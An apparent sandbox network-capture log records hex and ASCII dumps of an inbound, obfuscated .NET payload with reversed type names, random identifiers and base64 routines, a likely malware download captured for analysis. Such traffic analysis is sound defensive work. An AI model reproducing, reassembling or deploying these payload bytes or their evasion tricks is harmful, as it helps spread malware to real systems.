2022-01-09 17:48:12 UTC	44	IN	Data Raw: 28 73 01 00 06 3a 7f e5 ff ff 26 20 51 00 00 00 38 74 e5 ff ff fe 0c 04 00 20 0b 00 00 00 20 6f 00 00 00 20 59 00 00 00 58 9c 20 c2 00 00 00 fe 0e 19 00 38 4d e5 ff ff 20 6e 00 00 00 20 21 00 00 00 58 fe 0e 1e 00 20 ab 00 00 00 38 38 e5 ff ff fe 0c 04 00 20 01 00 00 00 20 9b 00 00 00 20 33 00 00 00 59 9c 20 3b 01 00 00 28 72 01 00 06 3a 14 e5 ff ff 26 20 06 00 00 00 38 09 e5 ff ff 11 02 11 14 3f 57 08 00 00 20 02 00 00 00 38 f6 e4 ff ff fe 0c 0c 00 20 15 00 00 00 20 62 00 00 00 20 0f 00 00 00 58 9c 20 9b 00 00 00 28 73 01 00 06 39 d2 e4 ff ff 26 20 96 00 00 00 38 c7 e4 ff ff fe 0c 0c 00 20 1f 00 00 00 fe 0c 1e 00 9c 20 1b 00 00 00 28 73 01 00 06 3a aa e4 ff ff 26 20 36 00 00 00 38 9f e4 ff ff 20 1b 00 00 00 20 7a 00 00 00 58 fe 0e 1e 00 20 21 01 00 00 38 Data Ascii: (s:& Q8t o YX 8M n !X 88 3Y ;(r:& 8?W 8 b X (s9& 8 (s:& 68 zX !8
2022-01-09 17:48:12 UTC	45	IN	Data Raw: 00 20 39 00 00 00 20 1e 00 00 00 58 9c 20 2e 01 00 00 38 19 e0 ff ff fe 0c 0c 00 20 17 00 00 00 fe 0c 1e 00 9c 20 4f 00 00 00 38 01 e0 ff ff fe 0c 0c 00 20 02 00 00 00 20 64 00 00 00 20 75 00 00 00 58 9c 20 ed 00 00 00 fe 0e 19 00 38 da df ff ff fe 0c 0c 00 20 02 00 00 00 fe 0c 1e 00 9c 20 e8 00 00 00 fe 0e 19 00 38 be df ff ff fe 0c 0c 00 20 0c 00 00 00 20 b4 00 00 00 20 3c 00 00 00 59 9c 20 be 00 00 00 38 a3 df ff ff fe 0c 0c 00 20 07 00 00 00 20 51 00 00 00 20 79 00 00 00 58 9c 20 c9 00 00 00 fe 0e 19 00 38 7c df ff ff fe 0c 0c 00 20 13 00 00 00 fe 0c 1e 00 9c 20 79 00 00 00 28 73 01 00 06 3a 63 df ff ff 26 20 7a 00 00 00 38 58 df ff ff 20 e0 00 00 00 20 4a 00 00 00 59 fe 0e 11 00 20 08 00 00 00 38 3f df ff ff 38 82 0e 00 00 20 23 00 00 00 fe 0e 19 00 Data Ascii: 9 X .8 O8 d uX 8 8 <Y 8 Q yX 8\| y(s:c& z8X JY 8?8 #
2022-01-09 17:48:12 UTC	47	IN	Data Raw: 00 00 38 d0 da ff ff 20 00 00 00 00 20 53 00 00 00 58 fe 0e 1e 00 20 2a 00 00 00 28 72 01 00 06 3a b2 da ff ff 26 20 29 00 00 00 38 a7 da ff ff fe 0c 04 00 20 0c 00 00 00 20 fe 00 00 00 20 54 00 00 00 59 9c 20 59 00 00 00 fe 0e 19 00 38 80 da ff ff 11 20 11 14 3f 26 11 00 00 20 b3 00 00 00 38 71 da ff ff 20 a8 00 00 00 20 38 00 00 00 59 fe 0e 1e 00 20 18 00 00 00 38 58 da ff ff fe 0c 04 00 20 01 00 00 00 20 89 00 00 00 20 2d 00 00 00 59 9c 20 8b 01 00 00 38 39 da ff ff fe 0c 04 00 20 09 00 00 00 fe 0c 11 00 9c 20 6b 01 00 00 28 72 01 00 06 3a 1c da ff ff 26 20 32 01 00 00 38 11 da ff ff 11 17 8e 69 8d 16 00 00 01 13 18 20 fb 00 00 00 38 fc d9 ff ff 11 0b 11 16 11 0b 11 16 91 11 03 11 16 91 61 d2 9c 20 6e 00 00 00 fe 0e 19 00 38 d9 d9 ff ff fe 0c 0c 00 20 Data Ascii: 8 SX *(r:& )8 TY Y8 ?& 8q 8Y 8X -Y 89 k(r:& 28i 8a n8
2022-01-09 17:48:12 UTC	48	IN	Data Raw: 58 fe 0e 11 00 20 54 01 00 00 38 6f d5 ff ff fe 0c 0c 00 20 1d 00 00 00 fe 0c 1e 00 9c 20 07 00 00 00 28 73 01 00 06 3a 52 d5 ff ff 26 20 1d 01 00 00 38 47 d5 ff ff 11 15 11 26 5d 13 05 20 71 00 00 00 28 73 01 00 06 39 31 d5 ff ff 26 20 30 00 00 00 38 26 d5 ff ff 11 15 11 0e 17 59 40 26 dd ff ff 20 33 01 00 00 28 72 01 00 06 3a 0c d5 ff ff 26 20 e5 00 00 00 38 01 d5 ff ff 38 1b df ff ff 20 da 00 00 00 38 f2 d4 ff ff 11 17 8e 69 1a 5b 13 0e 20 10 01 00 00 28 72 01 00 06 3a db d4 ff ff 26 20 90 00 00 00 38 d0 d4 ff ff fe 0c 0c 00 20 1e 00 00 00 20 87 00 00 00 20 2d 00 00 00 59 9c 20 3d 00 00 00 38 b1 d4 ff ff fe 0c 0c 00 20 09 00 00 00 fe 0c 1e 00 9c 20 e2 00 00 00 38 99 d4 ff ff 11 25 11 25 28 67 01 00 06 28 69 01 00 06 69 28 6a 01 00 06 13 0d 20 76 01 00 Data Ascii: X T8o (s:R& 8G&] q(s91& 08&Y@& 3(r:& 88 8i[ (r:& 8 -Y =8 8%%(g(ii(j v
2022-01-09 17:48:12 UTC	49	IN	Data Raw: 00 59 9c 20 74 00 00 00 38 18 d0 ff ff fe 0c 04 00 20 0d 00 00 00 20 c2 00 00 00 20 40 00 00 00 59 9c 20 82 01 00 00 28 72 01 00 06 3a f4 cf ff ff 26 20 bf 00 00 00 38 e9 cf ff ff fe 0c 04 00 20 08 00 00 00 20 b1 00 00 00 20 3b 00 00 00 59 9c 20 18 00 00 00 28 73 01 00 06 3a c5 cf ff ff 26 20 58 00 00 00 38 ba cf ff ff fe 0c 04 00 20 0b 00 00 00 fe 0c 11 00 9c 20 57 01 00 00 38 a2 cf ff ff fe 0c 0c 00 20 1f 00 00 00 20 e5 00 00 00 20 4c 00 00 00 59 9c 20 6f 00 00 00 38 83 cf ff ff fe 0c 0c 00 20 03 00 00 00 20 40 00 00 00 20 74 00 00 00 58 9c 20 c8 00 00 00 28 73 01 00 06 3a 5f cf ff ff 26 20 60 01 00 00 38 54 cf ff ff 11 0f 73 21 00 00 0a 16 73 ca 00 00 0a 13 1b 20 0a 01 00 00 38 3b cf ff ff fe 0c 04 00 20 0f 00 00 00 fe 0c 11 00 9c 20 ad 00 00 00 28 73 Data Ascii: Y t8 @Y (r:& 8 ;Y (s:& X8 W8 LY o8 @ tX (s:_& `8Ts!s 8; (s
2022-01-09 17:48:12 UTC	51	IN	Data Raw: ff ff fe 0c 04 00 20 06 00 00 00 20 db 00 00 00 20 49 00 00 00 59 9c 20 7e 00 00 00 28 72 01 00 06 39 a6 ca ff ff 26 20 db 00 00 00 38 9b ca ff ff fe 0c 0c 00 20 15 00 00 00 20 37 00 00 00 20 2b 00 00 00 58 9c 20 6f 00 00 00 28 73 01 00 06 3a 77 ca ff ff 26 20 b7 00 00 00 38 6c ca ff ff fe 0c 0c 00 20 19 00 00 00 20 ee 00 00 00 20 4f 00 00 00 59 9c 20 0f 00 00 00 28 72 01 00 06 39 48 ca ff ff 26 20 17 00 00 00 38 3d ca ff ff 20 2f 00 00 00 20 4f 00 00 00 58 fe 0e 11 00 20 14 01 00 00 28 73 01 00 06 39 1f ca ff ff 26 20 89 00 00 00 38 14 ca ff ff 20 3e 00 00 00 20 04 00 00 00 59 fe 0e 11 00 20 95 00 00 00 38 fb c9 ff ff fe 0c 0c 00 20 0f 00 00 00 20 24 00 00 00 20 52 00 00 00 58 9c 20 33 00 00 00 38 dc c9 ff ff 11 14 16 3e c1 f2 ff ff 20 32 01 00 00 38 ca Data Ascii: IY ~(r9& 8 7 +X o(s:w& 8l OY (r9H& 8= / OX (s9& 8 > Y 8 $ RX 38> 28
2022-01-09 17:48:12 UTC	52	IN	Data Raw: 80 76 00 00 04 14 80 77 00 00 04 16 80 78 00 00 04 16 80 79 00 00 04 2a 00 2e 00 fe 09 00 00 28 23 00 00 0a 2a 3a fe 09 00 00 fe 09 01 00 6f 3b 00 00 0a 2a 00 2a fe 09 00 00 6f 39 01 00 06 2a 00 3a fe 09 00 00 fe 09 01 00 6f 37 00 00 0a 2a 00 2a fe 09 00 00 6f 3d 00 00 0a 2a 00 3a fe 09 00 00 fe 09 01 00 6f 3a 01 00 06 2a 00 2e 00 fe 09 00 00 28 7c 01 00 06 2a 3a fe 09 00 00 fe 09 01 00 6f d4 00 00 0a 2a 00 2a fe 09 00 00 6f 85 00 00 0a 2a 00 2a fe 09 00 00 6f 86 00 00 0a 2a 00 2a fe 09 00 00 6f d5 00 00 0a 2a 00 3e 00 fe 09 00 00 fe 09 01 00 28 7d 01 00 06 2a 2a fe 09 00 00 6f cd 00 00 0a 2a 00 16 14 14 fe 01 2a 00 00 0a 14 2a 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 16 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 03 00 04 00 00 00 00 00 Data Ascii: vwxy.(#:o;*o9:o7*o=:o:.(\|:ooo*o>(}o00*0
2022-01-09 17:48:12 UTC	53	IN	Data Raw: 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 12 00 00 17 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 02 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 17 Data Ascii: 00*00000*000000*0
2022-01-09 17:48:12 UTC	55	IN	Data Raw: 00 00 00 00 00 17 2a 03 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 03 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 03 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 03 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 03 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 03 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 1a 28 a9 00 00 06 2a 00 03 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 00 2a 00 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a Data Ascii: 000000***********(000
2022-01-09 17:48:12 UTC	59	IN	Data Raw: 68 2e 1a 82 2e 20 0a 00 00 01 00 00 47 2e 1a 61 2e 4b 0a 00 00 01 00 00 26 2e 1a 40 2e 76 0a 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 16 2a 01 10 00 00 00 00 0f 00 af be 00 13 0a 00 00 01 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 02 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 05 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 08 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 08 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 08 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 05 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 02 00 04 00 00 00 00 00 00 00 00 00 14 2a 03 30 08 00 08 00 00 00 00 00 00 00 00 Data Ascii: h.. G.a.K&.@.v0**0000000000*0
2022-01-09 17:48:12 UTC	63	IN	Data Raw: 06 2a 00 00 00 32 0e 02 0e 00 0e 01 6f d8 05 00 06 2a 00 00 00 42 28 a9 00 00 06 d0 bd 00 00 02 28 a0 00 00 06 2a 00 00 00 2a 0e 01 0e 00 6f dc 05 00 06 2a 00 42 28 a9 00 00 06 d0 be 00 00 02 28 a0 00 00 06 2a 00 00 00 32 0e 02 0e 00 0e 01 6f e0 05 00 06 2a 00 00 00 42 28 a9 00 00 06 d0 bf 00 00 02 28 a0 00 00 06 2a 00 00 00 32 0e 02 0e 00 0e 01 6f e4 05 00 06 2a 00 00 00 42 28 a9 00 00 06 d0 c0 00 00 02 28 a0 00 00 06 2a 00 00 00 2a 0e 01 0e 00 6f e8 05 00 06 2a 00 42 28 a9 00 00 06 d0 c1 00 00 02 28 a0 00 00 06 2a 00 00 00 32 0e 02 0e 00 0e 01 6f ec 05 00 06 2a 00 00 00 42 28 a9 00 00 06 d0 c2 00 00 02 28 a0 00 00 06 2a 00 00 00 32 0e 02 0e 00 0e 01 6f f0 05 00 06 2a 00 00 00 42 28 a9 00 00 06 d0 c3 00 00 02 28 a0 00 00 06 2a 00 00 00 2a 0e 01 0e 00 6f Data Ascii: 2oB((*oB((2oB((2oB((*oB((2oB((2oB((**o
2022-01-09 17:48:12 UTC	64	IN	Data Raw: 23 53 74 72 69 6e 67 73 00 00 00 00 28 0c 01 00 20 10 00 00 23 55 53 00 48 1c 01 00 10 00 00 00 23 47 55 49 44 00 00 00 58 1c 01 00 fc 22 00 00 23 42 6c 6f 62 00 00 00 00 00 00 00 02 00 00 01 57 fd a3 3d 09 0f 00 00 00 00 00 00 00 00 00 00 01 00 00 00 89 00 00 00 d8 00 00 00 04 02 00 00 47 06 00 00 30 03 00 00 98 01 00 00 02 00 00 00 21 00 00 00 43 00 00 00 01 00 00 00 0e 00 00 00 1f 00 00 00 4a 00 00 00 04 00 00 00 05 00 00 00 09 00 00 00 02 00 00 00 25 00 00 00 05 00 00 00 0a 00 00 00 01 00 00 00 05 00 00 00 04 00 00 00 51 00 00 00 05 00 00 00 0e 00 00 00 00 00 00 01 01 00 00 00 00 00 06 00 09 00 29 00 06 00 58 00 5d 00 06 00 64 00 5d 00 06 00 6a 00 5d 00 06 00 72 00 29 00 06 00 90 00 a4 00 1b 00 b7 00 00 00 06 00 c6 00 5d 00 06 00 cd 00 e6 00 06 00 49 Data Ascii: #Strings( #USH#GUIDX"#BlobW=G0!CJ%Q)X]d]j]r)]I
2022-01-09 17:48:12 UTC	68	IN	Data Raw: 05 06 00 a1 23 66 05 06 00 b2 23 63 05 06 00 bc 23 69 05 06 00 c7 23 6d 05 06 00 d6 23 66 05 06 00 dc 23 63 05 06 00 f0 23 63 05 06 00 fa 23 63 05 06 00 06 24 63 05 06 00 14 24 63 05 06 00 23 24 63 05 06 00 31 24 63 05 06 00 2c 21 b9 01 06 00 17 23 b9 01 06 00 42 24 71 05 06 00 4e 24 71 05 06 00 59 24 71 05 06 00 5c 24 01 02 06 00 67 24 01 02 06 00 71 24 01 02 06 00 79 24 71 05 06 00 7d 24 71 05 06 00 81 24 71 05 06 00 89 24 71 05 06 00 91 24 71 05 06 00 9f 24 71 05 06 00 ad 24 71 05 06 00 bd 24 71 05 06 00 c5 24 74 05 06 00 d1 24 74 05 06 00 dd 24 b9 01 06 00 e9 24 b9 01 06 00 f3 24 b9 01 06 00 fe 24 b9 01 01 00 08 25 a5 02 11 00 3a 25 75 01 33 01 e5 25 7d 05 13 00 0e 26 82 05 13 00 31 26 87 05 11 00 ab 26 bb 05 13 00 b5 26 be 05 11 00 d8 26 b9 01 11 00 Data Ascii: #f#c#i#m#f#c#c#c$c$c#$c1$c,!#B$qN$qY$q\$g$q$y$q}$q$q$q$q$q$q$q$t$t$$$$%:%u3%}&1&&&&
2022-01-09 17:48:12 UTC	72	IN	Data Raw: 00 00 03 00 c6 01 e9 17 f1 04 79 00 00 00 00 00 03 00 c6 01 3d 21 f9 04 7c 00 00 00 00 00 03 00 c6 01 6d 21 83 04 80 00 f8 23 00 00 00 00 91 18 ac 16 37 01 82 00 00 00 00 00 03 00 86 18 52 00 65 01 82 00 00 00 00 00 03 00 c6 01 e9 17 07 05 84 00 00 00 00 00 03 00 c6 01 3d 21 0d 05 86 00 00 00 00 00 03 00 c6 01 6d 21 19 05 8a 00 00 24 00 00 00 00 91 18 ac 16 37 01 8b 00 00 00 00 00 03 00 86 18 52 00 65 01 8b 00 00 00 00 00 03 00 c6 01 e9 17 20 05 8d 00 00 00 00 00 03 00 c6 01 3d 21 2c 05 93 00 00 00 00 00 03 00 c6 01 6d 21 3e 05 9b 00 08 24 00 00 00 00 91 18 ac 16 37 01 9e 00 00 00 00 00 03 00 86 18 52 00 65 01 9e 00 00 00 00 00 03 00 c6 01 e9 17 49 05 a0 00 00 00 00 00 03 00 c6 01 3d 21 a3 04 a1 00 00 00 00 00 03 00 c6 01 6d 21 19 05 a4 00 10 24 00 00 00 Data Ascii: y=!\|m!#7Re=!m!$7Re =!,m!>$7ReI=!m!$
2022-01-09 17:48:12 UTC	76	IN	Data Raw: 00 08 00 86 18 52 00 fc 0e c2 01 54 ea 00 00 08 00 86 18 52 00 01 0f c3 01 64 ea 00 00 08 00 c6 00 9b 40 08 0f c4 01 6c ea 00 00 08 00 86 18 52 00 b3 00 c4 01 74 ea 00 00 08 00 86 18 52 00 0e 0f c5 01 7c ea 00 00 08 00 86 18 52 00 13 0f c6 01 84 ea 00 00 08 00 86 18 52 00 1b 0f c8 01 8c ea 00 00 08 00 c6 00 a6 40 7e 01 ca 01 9c ea 00 00 08 00 c6 00 b1 40 7e 01 ca 01 a4 ea 00 00 08 00 c6 00 bc 40 29 0f ca 01 b4 ea 00 00 08 00 c3 02 c7 40 38 0f cb 01 c4 ea 00 00 08 00 83 00 d2 40 38 0f cc 01 d4 ea 00 00 08 00 c6 00 dd 40 4d 0f cd 01 dc ea 00 00 08 00 c3 02 e8 40 7e 01 cd 01 e4 ea 00 00 08 00 c6 00 f3 40 4d 0f cd 01 ec ea 00 00 08 00 86 00 fe 40 4d 0f cd 01 f4 ea 00 00 08 00 c6 00 09 41 4d 0f cd 01 fc ea 00 00 08 00 c6 00 14 41 4d 0f cd 01 04 eb 00 00 08 00 Data Ascii: RTRd@lRtR\|RR@~@~@)@8@8@M@~@M@MAMAM
2022-01-09 17:48:12 UTC	81	IN	Data Raw: 08 00 c3 02 c9 43 74 0f 40 02 e0 f7 00 00 08 00 c6 00 d4 43 74 0f 41 02 f0 f7 00 00 08 00 c6 00 df 43 74 0f 42 02 00 f8 00 00 08 00 c6 00 ea 43 74 0f 43 02 10 f8 00 00 08 00 c6 00 f5 43 74 0f 44 02 20 f8 00 00 08 00 c6 00 00 44 74 0f 45 02 30 f8 00 00 08 00 c6 00 0b 44 74 0f 46 02 40 f8 00 00 08 00 c6 00 16 44 74 0f 47 02 50 f8 00 00 08 00 c6 00 21 44 74 0f 48 02 60 f8 00 00 08 00 93 00 40 47 ba 0a 49 02 68 f8 00 00 08 00 93 00 54 47 45 01 49 02 70 f8 00 00 08 00 93 00 68 47 fb 0f 49 02 78 f8 00 00 08 00 93 00 7c 47 74 09 49 02 80 f8 00 00 08 00 93 00 90 47 74 09 49 02 88 f8 00 00 08 00 93 00 a4 47 74 09 49 02 90 f8 00 00 08 00 93 00 b8 47 74 09 49 02 98 f8 00 00 08 00 93 00 cc 47 74 09 49 02 a0 f8 00 00 08 00 93 00 e0 47 ba 0a 49 02 a8 f8 00 00 08 00 93 Data Ascii: Ct@CtACtBCtCCtD DtE0DtF@DtGP!DtH`@GIhTGEIphGIx\|GtIGtIGtIGtIGtIGI
2022-01-09 17:48:12 UTC	85	IN	Data Raw: 00 93 00 3c 4d 22 11 b9 02 cc 00 01 00 00 00 91 18 ac 16 37 01 b9 02 d4 00 01 00 08 00 86 18 52 00 d7 00 b9 02 dc 00 01 00 08 00 93 00 a6 4d 45 01 b9 02 e4 00 01 00 08 00 93 00 ba 4d 28 11 b9 02 ec 00 01 00 00 00 91 18 ac 16 37 01 b9 02 f4 00 01 00 08 00 86 18 52 00 d7 00 b9 02 fc 00 01 00 08 00 93 00 19 4e 45 01 b9 02 04 01 01 00 08 00 93 00 2d 4e 5c 11 b9 02 0c 01 01 00 00 00 91 18 ac 16 37 01 b9 02 14 01 01 00 08 00 86 18 52 00 67 11 b9 02 1c 01 01 00 08 00 93 00 6b 4e 45 01 bb 02 24 01 01 00 08 00 93 00 7f 4e 6f 11 bb 02 2c 01 01 00 00 00 91 18 ac 16 37 01 bb 02 34 01 01 00 08 00 86 18 52 00 84 11 bb 02 3c 01 01 00 08 00 86 18 52 00 9c 11 bd 02 44 01 01 00 08 00 c6 00 bd 4e a7 11 bf 02 54 01 01 00 08 00 c6 00 c4 4e a0 07 c0 02 74 01 01 00 08 00 86 00 Data Ascii: <M"7RMEM(7RNE-N\7RgkNE$No,74R<RDNTNt
2022-01-09 17:48:12 UTC	89	IN	Data Raw: 10 18 ac 16 37 01 31 03 00 00 00 00 03 00 46 00 e9 17 fe 18 31 03 44 0d 01 00 08 00 16 00 e9 6a 07 19 31 03 00 00 00 00 03 00 06 18 52 00 65 01 31 03 58 0d 01 00 08 00 10 18 ac 16 37 01 31 03 00 00 00 00 03 00 46 00 e9 17 e1 0f 31 03 6c 0d 01 00 08 00 16 00 e9 6a 18 19 31 03 00 00 00 00 03 00 06 18 52 00 65 01 31 03 78 0d 01 00 08 00 10 18 ac 16 37 01 31 03 00 00 00 00 03 00 46 00 e9 17 25 19 31 03 8c 0d 01 00 08 00 16 00 e9 6a 2d 19 31 03 00 00 00 00 03 00 06 18 52 00 65 01 31 03 9c 0d 01 00 08 00 10 18 ac 16 37 01 31 03 00 00 00 00 03 00 46 00 e9 17 3d 19 31 03 b0 0d 01 00 08 00 16 00 e9 6a 45 19 31 03 00 00 00 00 03 00 06 18 52 00 65 01 31 03 bc 0d 01 00 08 00 10 18 ac 16 37 01 31 03 00 00 00 00 03 00 46 00 e9 17 55 19 31 03 d0 0d 01 00 08 00 16 00 e9 Data Ascii: 71F1Dj1Re1X71F1lj1Re1x71F%1j-1Re171F=1jE1Re171FU1
2022-01-09 17:48:12 UTC	93	IN	Data Raw: 00 e9 6a b1 1f 31 03 00 00 00 00 03 00 06 18 52 00 65 01 31 03 64 17 01 00 08 00 10 18 ac 16 37 01 31 03 00 00 01 00 b8 05 00 00 01 00 a7 17 00 00 02 00 d6 17 00 00 01 00 a4 19 10 10 02 00 e3 19 00 00 01 00 68 1a 00 00 01 00 68 1a 00 00 01 00 09 1b 00 00 00 00 00 00 00 00 01 00 30 1c 00 00 01 00 50 1c 00 00 01 00 d7 1c 00 00 01 00 68 1a 00 00 01 00 68 1a 00 00 01 00 c4 1d 00 00 01 00 68 1a 00 00 01 00 64 1e 00 00 01 00 38 1f 00 20 00 00 00 00 00 00 01 00 5a 1f 00 00 01 00 5a 1f 00 00 02 00 71 1f 00 00 01 00 cc 1f 00 00 01 00 51 20 00 00 01 00 84 20 00 00 01 00 1e 21 00 00 02 00 25 21 00 20 00 00 00 00 00 20 01 00 2c 21 00 20 02 00 35 21 00 20 01 00 2c 21 00 20 02 00 35 21 00 00 03 00 64 21 00 00 04 00 1e 21 00 20 00 00 00 00 00 20 01 00 35 21 00 00 02 00 Data Ascii: j1Re1d71hh0Phhhd8 ZZqQ !%! ,! 5! ,! 5!d!! 5!
2022-01-09 17:48:12 UTC	96	IN	Data Raw: 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 02 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 02 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 00 01 00 97 29 00 Data Ascii: )))))))))))))))))))))))))))))))))))))))))))
2022-01-09 17:48:12 UTC	100	IN	Data Raw: 0c 52 21 2e 00 23 00 ea 00 2e 00 1b 00 db 00 2e 00 0b 00 a1 00 2e 00 13 00 b8 00 64 00 93 0c 52 21 83 00 ab 0c 52 21 e3 00 ab 0c 52 21 24 01 9b 0c 52 21 43 01 ab 0c 52 21 63 01 ab 0c 52 21 e4 01 9b 0c 52 21 04 02 9b 0c 52 21 e4 02 93 0c 52 21 83 04 ab 0c 52 21 c3 05 bb 0c 5f 22 e3 05 bb 0c 5f 22 43 06 bb 0c 6f 22 60 06 a3 0c 57 21 63 06 bb 0c 5f 22 83 06 bb 0c 5f 22 a3 06 bb 0c 5f 22 c3 06 bb 0c 5f 22 e3 06 bb 0c 5f 22 03 07 c3 0c 52 21 41 08 ab 0c 52 21 83 0b ab 0c 52 21 83 0c ab 0c 52 21 a3 0c ab 0c 52 21 e1 0d 2a 09 6e 21 a0 0f ab 0c 52 21 c0 0f ab 0c 52 21 20 17 b3 0c 25 22 27 00 11 04 39 00 11 04 3b 00 4a 04 3d 00 11 04 3f 00 4a 04 41 00 11 04 47 00 11 04 49 00 11 04 51 00 11 04 53 00 4a 04 55 00 4a 04 57 00 4a 04 59 00 69 04 5b 00 4a 04 5d 00 4a 04 Data Ascii: R!.#...dR!R!R!$R!CR!cR!R!R!R!R!_"_"Co"`W!c_"_"_"_"_"R!AR!R!R!R!*n!R!R! %"'9;J=?JAGIQSJUJWJYi[J]J
2022-01-09 17:48:12 UTC	104	IN	Data Raw: 65 56 54 47 64 45 77 41 00 49 36 39 37 36 50 35 39 37 75 4f 52 38 54 47 57 33 6f 00 41 38 72 4b 6b 74 41 64 45 43 6b 64 6f 6b 46 43 78 71 00 4e 6c 45 68 45 34 34 68 39 32 38 79 4e 33 42 56 6c 63 00 56 48 56 6a 42 4e 4d 38 52 67 4e 47 62 6f 44 5a 56 31 00 41 79 54 53 71 71 39 55 55 67 6a 62 45 64 74 36 58 58 00 6c 65 31 30 44 4b 53 78 59 71 5a 6f 4b 34 79 4c 4a 72 00 41 6d 67 41 6f 39 31 41 76 46 71 66 47 43 78 59 44 4c 70 00 58 34 6b 46 58 68 31 6c 34 76 37 67 54 54 4e 34 37 6a 50 00 53 76 36 30 6a 6e 31 55 70 59 77 77 72 34 54 33 72 75 54 00 65 67 43 68 35 43 31 51 4f 45 57 78 67 48 67 39 59 72 41 00 47 6e 6c 45 78 62 31 64 41 55 39 4c 6f 77 33 31 57 51 6f 00 75 53 56 44 73 34 31 39 52 53 74 49 44 75 65 4e 59 47 77 00 6c 78 34 4c 59 57 31 53 4f 64 71 31 Data Ascii: eVTGdEwAI6976P597uOR8TGW3oA8rKktAdECkdokFCxqNlEhE44h928yN3BVlcVHVjBNM8RgNGboDZV1AyTSqq9UUgjbEdt6XXle10DKSxYqZoK4yLJrAmgAo91AvFqfGCxYDLpX4kFXh1l4v7gTTN47jPSv60jn1UpYwwr4T3ruTegCh5C1QOEWxgHg9YrAGnlExb1dAU9Low31WQouSVDs419RStIDueNYGwlx4LYW1SOdq1
2022-01-09 17:48:12 UTC	108	IN	Data Raw: 73 51 43 30 59 41 5a 64 6d 6c 62 53 69 51 61 45 00 72 65 74 72 65 76 6e 6f 43 6d 75 6e 45 6c 61 63 69 74 65 62 61 68 70 6c 41 73 63 69 74 73 6f 6e 67 61 69 44 6d 65 74 73 79 53 34 33 35 32 38 00 41 5a 74 73 51 6f 30 62 52 63 65 56 68 5a 55 58 68 79 58 00 76 61 6c 75 65 00 45 6d 70 74 79 00 67 65 74 5f 56 61 6c 75 65 00 73 65 74 5f 56 61 6c 75 65 00 43 61 6c 6c 53 69 74 65 60 31 00 53 79 73 74 65 6d 2e 43 6f 72 65 00 46 75 6e 63 60 33 00 43 61 6c 6c 53 69 74 65 00 43 72 65 61 74 65 00 43 61 6c 6c 53 69 74 65 42 69 6e 64 65 72 00 54 61 72 67 65 74 00 6e 6f 69 74 63 65 6c 6c 6f 43 74 6e 65 6d 65 6c 45 65 63 69 76 72 65 53 6e 6f 69 74 61 72 75 67 69 66 6e 6f 43 6c 65 64 6f 4d 65 63 69 76 72 65 53 6d 65 74 73 79 53 39 31 33 33 36 00 62 61 73 65 36 34 45 6e 63 Data Ascii: sQC0YAZdmlbSiQaEretrevnoCmunElacitebahplAscitsongaiDmetsyS43528AZtsQo0bRceVhZUXhyXvalueEmptyget_Valueset_ValueCallSite`1System.CoreFunc`3CallSiteCreateCallSiteBinderTargetnoitcelloCtnemelEecivreSnoitarugifnoCledoMecivreSmetsyS91336base64Enc
